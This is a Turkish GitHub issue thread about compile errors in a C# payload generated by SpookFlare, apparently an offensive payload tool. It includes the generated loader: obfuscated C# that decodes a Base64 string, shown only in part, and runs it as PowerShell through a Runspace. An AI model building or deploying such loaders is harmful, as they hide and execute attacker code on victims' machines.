### ISSUE TITLE
C# kodunu derlerken "Newline in constant" hatası

### ISSUE THREAD

**Issue by abdllhcay** [hlldz/SpookFlare#13]
C# kodunu csc.exe ile derlemek istediğimde aşağıdaki hata ile karşılaşıyorum:

`Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,56): error CS1010: Newline in constant
Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected
Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected`

**Comment by hlldz** [comment]
Kodu, derlerken kullandığın komut ve argümanlarını paylaşabilir misin?

**Comment by abdllhcay** [comment]
> 
> Kodu, derlerken kullandığın komut ve argümanlarını paylaşabilir misin?

`csc.exe -out:output.exe jhjzjTwQRIma.cs`

**Comment by abdllhcay** [comment]
> 
> 
> Kodu, derlerken kullandığın komut ve argümanlarını paylaşabilir misin?

**Comment by hlldz** [comment]
SpookFlare'ın oluşturduğu Payload'ı (kodu) paylaşır mısın?

**Comment by abdllhcay** [comment]
> 
> 
> SpookFlare'ın oluşturduğu Payload'ı (kodu) paylaşır mısın?

`
using System;
using System.IO; 
using System.Diagnostics; 
using System.Reflection; 
using System.Runtime.InteropServices; 
using System.Collections.ObjectModel; 
using System.Management.Automation; 
using System.Management.Automation.Runspaces; 
using System.Text;     
public class hbEVgGRQWvcR {
public static void Main() {
        byte[] RwAvcMPAXtqv = Convert.FromBase64String("J H N F W V F M e W h B b V F R"); 
string sUHkzmXYewDe = Encoding.Unicode.GetString(RwAvcMPAXtqv);
	Runspace qOKsnojgtBea = RunspaceFactory.CreateRunspace();
        qOKsnojgtBea.Open();
        RunspaceInvoke rVvBKKQEntOj = new RunspaceInvoke(qOKsnojgtBea);
        Pipeline PigDmZAEQaxu = qOKsnojgtBea.CreatePipeline();
        PigDmZAEQaxu.Commands.AddScript(sUHkzmXYewDe);
        PigDmZAEQaxu.Invoke();
        qOKsnojgtBea.Close();
        return;
    }
}`

Base64 string'inin hepsini yazmadım.

**Comment by hlldz** [comment]
Kendi testlerimde şu anki yaşanan sorundan başka ama onu etkileyecek bir sorun buldum ve kod içerisinde bazı değişiklikler yaparak sorunu giderdim. Projeyi baştan indirip deneyebilirsin, sorun çıkacağını sanmıyorum.

Ayrıca, paylaştığın içerik üzerinden anlaşılıyor ki PowerShell modülünü kullanıyorsun. PowerShell modülü kullanılarak oluşturulan .cs uzantılı payloadları derlerken System.Management.Automation.dll'i referans olarak ekleyi unutma.
